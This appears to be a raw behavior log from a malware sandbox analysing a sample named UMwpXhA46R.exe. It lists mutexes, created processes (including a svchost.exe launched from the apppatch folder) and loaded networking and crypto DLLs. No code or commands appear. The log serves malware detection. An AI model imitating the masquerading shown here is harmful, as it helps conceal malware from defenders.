Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1220
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5128
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3896
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6912
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2268
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile created: C:\Users\user\AppData\Local\Temp\6D41.tmpJump to behavior
Source: UMwpXhA46R.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UMwpXhA46R.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: UMwpXhA46R.exeReversingLabs: Detection: 81%
Source: UMwpXhA46R.exeString found in binary or memory: -help
Source: svchost.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile read: C:\Users\user\Desktop\UMwpXhA46R.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\UMwpXhA46R.exe "C:\Users\user\Desktop\UMwpXhA46R.exe"
Source: C:\Users\user\Desktop\UMwpXhA46R.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 884
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 2076
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 968
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1008
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 832
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1008
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 1244
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 908
Source: C:\Users\user\Desktop\UMwpXhA46R.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: inetres.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetres.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: symsrv.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: schannel.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: schannel.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
